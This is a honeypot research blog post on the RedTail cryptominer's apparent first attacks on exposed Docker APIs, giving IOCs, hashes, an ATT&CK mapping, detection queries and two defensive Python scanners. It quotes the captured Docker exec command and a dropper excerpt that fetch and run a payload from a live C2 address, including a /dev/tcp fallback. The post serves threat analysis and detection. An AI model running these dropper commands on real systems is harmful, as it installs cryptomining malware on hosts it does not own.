RedTail Cryptominer: First Evidence of Docker API Targeting
Mario Candela
Founder and maintainer
TL;DR - Executive Summary
Data from my Beelzebub honeypot has captured what appears to be the first documented evidence of RedTail cryptominer attacking exposed Docker APIs (port 2375). Despite extensive research across vendor reports, threat intelligence platforms, GitHub repositories, and academic analyses, no public source documents RedTail targeting Docker - only web applications and network appliances.
This could be a significant discovery indicating a new tactical evolution by the threat actor.
The Capture: Honeypot Logs
On November 13, 2025 at 14:13:38 UTC, the Beelzebub honeypot recorded this attack:
```json
{
  "RemoteAddr": "62.84.181.157:29880",
  "Location": "Shrewsbury, United Kingdom",
  "HTTPMethod": "POST",
  "RequestURI": "/containers/a0c2c51c1f7a4b20a9cc1a0b4a9b06f3040c14b496f0f3c21bd7e0f3ae90f7b6/exec",
  "UserAgent": "libredtail-http",
  "Body": {
    "Cmd": [
      "sh", "-c",
      "cd /tmp || cd /var/tmp; curl http://178.16.55.224/sh -o redtail.sh || wget http://178.16.55.224/sh -O redtail.sh; chmod +x redtail.sh; ./redtail.sh docker.selfrep; rm -rf redtail.sh"
    ]
  }
}
```
Key elements:
- Target: Docker Engine API v1.43 (port 2375)
- User-Agent: libredtail-http (unique RedTail signature)
- C2 Server: 178.16.55.224 (confirmed RedTail infrastructure)
- Parameter: docker.selfrep (self-replication mode)
Payload Analysis
I captured the sh script downloaded from the C2. Here’s what it does:
1. Random Name Generation
```sh
# Builds a random alphanumeric name for dropped files; the length variable
# $len is set outside this excerpt of the captured script.
get_random_string() {
  openssl rand -base64 256 | tr -dc 'A-Za-z0-9' | head -c "$len"
}
```
2. Resilient Multi-Method Download
```sh
# Fetches $1 from the C2: wget first, then curl, and as a last resort a raw TCP
# socket opened by bash itself through /dev/tcp (the request line is elided in the capture).
dlr() {
  wget http://178.16.55.224/$1 ||
  curl -O http://178.16.55.224/$1 ||
  exec 3<>"/dev/tcp/178.16.55.224/80"
  echo -e "GET /$1 HTTP/1.0\r\n..." >&3
}
```
Note: the /dev/tcp fallback means the download can complete without wget or curl ever being executed, so monitoring that keys on those processes misses it!
3. Writable Directory Search
The script scans the filesystem for a place to drop its binaries:
- Looks for directories with u=rwx permissions
- Avoids partitions mounted with the noexec flag
- Excludes /proc and monitored directories
- Verifies available space (2MB test)
4. Multi-Architecture Deployment
Downloads and executes architecture-specific binaries for:
- x86_64 / amd64
- i686 (32-bit)
- ARM v7 / v8 (aarch64)
5. “clean” Script
Before installation, the dropper executes a script that likely:
- Terminates competing cryptominers
- Removes other attackers’ malware
- Frees CPU resources
Threat Intelligence Research
After capturing this data, I conducted deep research using Claude to correlate information across dozens of sources. The research covered:
- Security vendor reports (Akamai, Forescout, Trend Micro, Kaspersky, Microsoft)
- Threat intelligence platforms (VirusTotal, AbuseIPDB, Malpedia, Joe Sandbox)
- GitHub repositories and analyses (honeypot logs, malware samples)
- Academic papers (ACM, IEEE, ArXiv)
- Security community (SANS ISC, forums, social media)
What Is Confirmed
RedTail is extensively documented in the following campaigns:
Evolution Timeline
Phase 1 (December 2023 - February 2024)
- First observation: Log4Shell exploitation
- SANS ISC: 400+ file submissions from IPs 193.222.96.163 and 45.95.147.236
- Basic multi-architecture deployment
- SSH brute force (root/Passw0rd123)
Phase 2 (March - April 2024)
- CVE-2024-3400 (PAN-OS CVSS 10.0)
- Private mining pools (no visible wallets)
- Advanced anti-debugging
- Encrypted communications via SSH-agent
- Expansion: TP-Link, VMware Workspace ONE, Ivanti VPN
Phase 3 (June 2024 - Present)
- CVE-2024-4577 (PHP-CGI CVSS 9.8)
- 178.16.55.224 as primary C2
- User-Agent “libredtail-http”
- Forescout: 227 attempts in 2 weeks
Exploited Vulnerabilities
- CVE-2024-4577 (PHP-CGI)
- CVE-2024-3400 (PAN-OS)
- CVE-2024-21887, CVE-2023-46805 (Ivanti)
- CVE-2023-1389 (TP-Link)
- CVE-2022-22954 (VMware)
- CVE-2021-44228 (Log4Shell)
- CVE-2018-20062 (ThinkPHP)
What Was NOT Found
Despite searching across:
- Vendor reports: Akamai, Forescout, Trend Micro, Kaspersky
- Threat intel: VirusTotal, AbuseIPDB, Malpedia, Joe Sandbox
- Honeypots: SANS ISC (3 diary entries), GitHub repositories
- Academic: ACM, IEEE papers, arXiv research
- Community: Security Twitter/X, Reddit, LinkedIn
ZERO mentions of:
- RedTail + Docker API
- 178.16.55.224 + port 2375
- Parameter “docker.selfrep”

Hypotheses
Hypothesis 1: Infrastructure Reuse
The threat actor uses 178.16.55.224 for multiple campaigns:
- Web exploitation → Documented RedTail
- Docker API targeting → Unpublished variant
Hypothesis 2: Intelligence Gap
- Docker exploitation is occurring, but below the public reporting threshold
- It has not yet reached vendor awareness
Indicators of Compromise (IOCs)
Network
C2 Server: 178.16.55.224
ASN: AS214943 (Railnet LLC)
User-Agent: libredtail-http
Mining Port: 25720/TCP
URL Pattern: http://178.16.55.224/sh
Parameters: *.selfrep (php.selfrep, docker.selfrep)
Attacker IPs (Confirmed Campaigns)
36.140.33.10
141.98.11.82
45.128.232.200
5.182.211.148
94.103.125.37
87.120.113.231
File System
Script: redtail.sh
Hidden file: .redtail, .<random_string>
Binary pattern: x86_64, i686, aarch64, arm7
Persistence: @reboot cron jobs
SSH: authorized_keys modification
Hashes (from Forescout Analysis)
Shell Script: 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
Packed ELF: ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
Unpacked ELF: 9ffad174474bb65e574baa567b23ffc1e13359fe2749b02fc8fc7846caceff7a
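As an added example (not part of this post or of Beelzebub's code), the following Python script turns the file-system IOCs above into a host hunt: @reboot cron entries, authorized_keys entries outside an analyst-supplied baseline, the redtail.sh and architecture file names, dot-files with long random names in writable temp directories, the Forescout hashes, and the C2 address appearing inside dropped files. The directory layout (CRON_DIRS, KEY_DIRS, TMP_DIRS), the 16-character threshold for "random" names and the placeholder key blobs are assumptions; build_fixture() writes constructed stand-in files so the hunt runs offline.

```python
"""Hunt a Linux filesystem for the RedTail host artefacts listed in the IOC section."""
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Forescout hashes quoted above: shell script, packed ELF, unpacked ELF.
KNOWN_HASHES = {
    "2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb",
    "ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd",
    "9ffad174474bb65e574baa567b23ffc1e13359fe2749b02fc8fc7846caceff7a",
}
REDTAIL_C2 = b"178.16.55.224"
CRON_DIRS = ("var/spool/cron", "var/spool/cron/crontabs", "etc/cron.d")
KEY_DIRS = ("root", "home")                      # where authorized_keys files normally live
TMP_DIRS = ("tmp", "var/tmp", "dev/shm")         # writable drop locations the dropper prefers
ARCH_NAMES = {"x86_64", "i686", "aarch64", "arm7"}
# ".redtail", or a dot-file whose name is a long alphanumeric run (the openssl rand naming above).
HIDDEN_RE = re.compile(r"^\.(?:redtail|[A-Za-z0-9]{16,})$")
MAX_READ = 50 * 1024 * 1024                      # never slurp anything larger than 50 MB
# Placeholder key blobs for the fixture only; these are not valid public keys.
ADMIN_KEY_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKeyPlaceholder0000000000000"
ROGUE_KEY_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedRogueKeyPlaceholder0000000000"


def sha256_file(path):
    """Hex SHA-256 of a file, for comparing a suspicious sample against KNOWN_HASHES by hand."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def hunt(root, baseline_keys=frozenset(), known_hashes=KNOWN_HASHES):
    """Return [(finding_type, detail)] for artefacts under root; pass "/" on a live host (as root)."""
    root = Path(root)
    findings = []
    # 1. Persistence: @reboot cron entries (T1053.003 in the ATT&CK mapping).
    for rel in CRON_DIRS:
        d = root / rel
        for f in (d.iterdir() if d.is_dir() else []):
            if f.is_file():
                for line in f.read_text(errors="replace").splitlines():
                    if line.lstrip().startswith("@reboot"):
                        findings.append(("cron_reboot", f"{f.relative_to(root)}: {line.strip()}"))
    # 2. authorized_keys entries whose key blob is not in the analyst-supplied baseline.
    for rel in KEY_DIRS:
        d = root / rel
        for f in (d.rglob("authorized_keys") if d.is_dir() else []):
            for line in f.read_text(errors="replace").splitlines():
                toks = line.split()  # optional options field, key type, blob, optional comment
                i = next((n for n, t in enumerate(toks) if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
                if i is not None and i + 1 < len(toks) and toks[i + 1] not in baseline_keys:
                    findings.append(("unknown_ssh_key", f"{f.relative_to(root)}: {toks[i]} {toks[i + 1][:12]}..."))
    # 3. Temp locations: dropper/arch file names, hidden random names, known hashes, C2 string.
    for rel in TMP_DIRS:
        d = root / rel
        for f in (d.rglob("*") if d.is_dir() else []):
            if f.is_symlink() or not f.is_file():
                continue
            relp = str(f.relative_to(root))
            if f.name == "redtail.sh" or f.name in ARCH_NAMES or HIDDEN_RE.match(f.name):
                findings.append(("suspicious_name", relp))
            if f.stat().st_size > MAX_READ:
                continue
            data = f.read_bytes()
            digest = hashlib.sha256(data).hexdigest()
            if digest in known_hashes:
                findings.append(("known_hash", f"{relp}: {digest}"))
            if REDTAIL_C2 in data:
                findings.append(("c2_reference", relp))
    return findings


def build_fixture():
    """Constructed infected-host tree in a temp dir: stand-in files only, no real malware."""
    root = Path(tempfile.mkdtemp(prefix="redtail-hunt-"))
    for rel in ("var/spool/cron/crontabs", "root/.ssh", "tmp", "var/tmp"):
        (root / rel).mkdir(parents=True)
    (root / "var/spool/cron/crontabs/root").write_text(
        "# constructed crontab\n@reboot /var/tmp/.Kq8ZmP3vW1xN7cR2 >/dev/null 2>&1\n")
    (root / "root/.ssh/authorized_keys").write_text(
        f"ssh-ed25519 {ADMIN_KEY_BLOB} admin@corp\nssh-rsa {ROGUE_KEY_BLOB}\n")
    (root / "tmp/.redtail").write_text("1\n")                       # marker file named in the IOCs
    (root / "tmp/redtail.sh").write_text(
        "#!/bin/sh\n# constructed stand-in for the dropper; contains 178.16.55.224 as a string only\n")
    (root / "var/tmp/.Kq8ZmP3vW1xN7cR2").write_bytes(b"\x7fELF constructed stand-in, not a real binary\n")
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    for kind, detail in hunt(fixture, baseline_keys={ADMIN_KEY_BLOB}):
        print(f"{kind:16} {detail}")
    shutil.rmtree(fixture)
```

On a suspected host, run it as root with `hunt(Path("/"), baseline_keys=<your approved key blobs>)`; the baseline is what turns the vague "authorized_keys modification" indicator into a concrete diff. On the fixture it reports one cron entry, one unknown key, three suspicious names and one C2 reference, and no hash match, since the stand-in files are not the real samples.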
Recommended Defenses
Detection Queries
Splunk
```
index=linux sourcetype=linux_secure
| search "libredtail-http" OR "178.16.55.224" OR ".redtail"
| stats count by host, user, src_ip
```
Elastic
```json
{
  "query": {
    "bool": {
      "should": [
        {"match": {"user_agent": "libredtail-http"}},
        {"match": {"destination.ip": "178.16.55.224"}},
        {"wildcard": {"file.path": "*redtail*"}}
      ]
    }
  }
}
```
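The indicators behind these queries, and the request captured at the top of this post, can also be applied directly to Docker API request logs. The following Python script is an added example written for this article, not part of the post or of Beelzebub; it assumes JSON-lines records with the field names seen in the capture (RemoteAddr, HTTPMethod, RequestURI, UserAgent, Body.Cmd), which any other log source would need to be mapped onto. It checks the User-Agent, the C2 address, the *.selfrep parameter and the generic fetch-then-execute chain separately, so a request that changes only the User-Agent (one of the constructed sample lines) is still flagged.

```python
"""Flag RedTail-style Docker API exec requests in JSON-lines request logs."""
import json
import re

REDTAIL_USER_AGENT = "libredtail-http"           # unique RedTail signature
REDTAIL_C2 = "178.16.55.224"                     # primary C2 / payload host
SELFREP_RE = re.compile(r"\b\w+\.selfrep\b")     # php.selfrep, docker.selfrep, ...
# Generic fetch-then-run chain: curl/wget a URL within one command, later chmod +x or ./run it.
DROPPER_RE = re.compile(r"(?:curl|wget)\b[^;|&]*https?://\S+.*?(?:chmod\s+\+x|\./\S+)", re.S)
# POST /containers/<id-or-name>/exec, with or without the /v1.NN prefix.
EXEC_PATH_RE = re.compile(r"^/(?:v\d+\.\d+/)?containers/[^/]+/exec$")


def _command_text(entry):
    """Extract the executed command from Body.Cmd (list form) or from a raw string body."""
    body = entry.get("Body")
    if isinstance(body, dict):
        return " ".join(str(c) for c in body.get("Cmd", []))
    if isinstance(body, str):
        return body
    return ""


def analyse_request(entry):
    """Return the indicator names matched by one log entry (empty list if none)."""
    hits = []
    if entry.get("UserAgent") == REDTAIL_USER_AGENT:
        hits.append("user_agent")
    if entry.get("HTTPMethod") == "POST" and EXEC_PATH_RE.match(entry.get("RequestURI", "")):
        hits.append("container_exec")
    cmd = _command_text(entry)
    if REDTAIL_C2 in cmd:
        hits.append("c2_ip")
    if SELFREP_RE.search(cmd):
        hits.append("selfrep_param")
    if DROPPER_RE.search(cmd):
        hits.append("download_execute")
    return hits


def scan_log(lines):
    """Return [(remote_addr, hits)] for every JSON line that matches at least one indicator."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a JSON record; skip it rather than abort the sweep
        hits = analyse_request(entry)
        if hits:
            alerts.append((entry.get("RemoteAddr", "?"), hits))
    return alerts


# Constructed JSON-lines input: the capture from this post plus made-up records.
SAMPLE_LOG = [
    json.dumps({
        "RemoteAddr": "62.84.181.157:29880", "HTTPMethod": "POST",
        "RequestURI": "/containers/a0c2c51c1f7a4b20a9cc1a0b4a9b06f3040c14b496f0f3c21bd7e0f3ae90f7b6/exec",
        "UserAgent": "libredtail-http",
        "Body": {"Cmd": ["sh", "-c",
                         "cd /tmp || cd /var/tmp; curl http://178.16.55.224/sh -o redtail.sh || "
                         "wget http://178.16.55.224/sh -O redtail.sh; chmod +x redtail.sh; "
                         "./redtail.sh docker.selfrep; rm -rf redtail.sh"]},
    }),
    # Benign (constructed): a local client listing containers.
    json.dumps({"RemoteAddr": "10.0.0.5:41022", "HTTPMethod": "GET", "RequestURI": "/containers/json",
                "UserAgent": "Docker-Client/24.0.7 (linux)", "Body": None}),
    # Constructed: same C2 and dropper chain but a different User-Agent; a UA-only rule misses it.
    json.dumps({"RemoteAddr": "192.0.2.10:51000", "HTTPMethod": "POST",
                "RequestURI": "/v1.43/containers/web1/exec", "UserAgent": "curl/8.5.0",
                "Body": {"Cmd": ["sh", "-c", "curl http://178.16.55.224/sh -o .x; chmod +x .x; ./.x php.selfrep"]}}),
    "not json at all",
]

if __name__ == "__main__":
    for addr, hits in scan_log(SAMPLE_LOG):
        print(f"{addr}: {', '.join(hits)}")
```

Feed it the honeypot's or a reverse proxy's JSON-lines output with `scan_log(open("requests.jsonl"))`; the per-indicator hits make it easy to rank an alert (all five indicators on the captured request, four on the renamed-UA variant) and to see which single indicator a future variant has dropped.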
MITRE ATT&CK Mapping
| Tactic | Technique | Evidence |
|---|---|---|
| Initial Access | T1190 - Exploit Public App | Docker API 2375, 8 CVEs |
| Execution | T1059.004 - Unix Shell | Bash dropper script |
| Persistence | T1053.003 - Cron | @reboot jobs |
| Privilege Escalation | T1611 - Escape Container | Host mount /:/host |
| Defense Evasion | T1027 - Obfuscated Files | Random filenames |
| Defense Evasion | T1070.004 - File Deletion | rm -rf self |
| Credential Access | T1552.001 - SSH Keys | authorized_keys mod |
| Discovery | T1083 - File Discovery | Filesystem scanning |
| Lateral Movement | T1021.004 - SSH | SSH key propagation |
| Command & Control | T1573 - Encrypted Channel | SSH-agent, AES JSON-RPC |
| Impact | T1496 - Resource Hijacking | XMRig cryptomining |
Conclusions
The Beelzebub honeypot has documented what appears to be the first public evidence of the RedTail cryptominer attacking exposed Docker APIs. This is a significant finding, considering that RedTail has been extensively documented in relation to 8 different vulnerabilities across web applications and network appliances, yet no public source had ever reported its use against Docker.
This represents a potentially critical gap in public threat intelligence. 🚨
This is the fifth article in our series dedicated to malware analysis. The Beelzebub team continues its commitment to making the internet a safer place. ❤️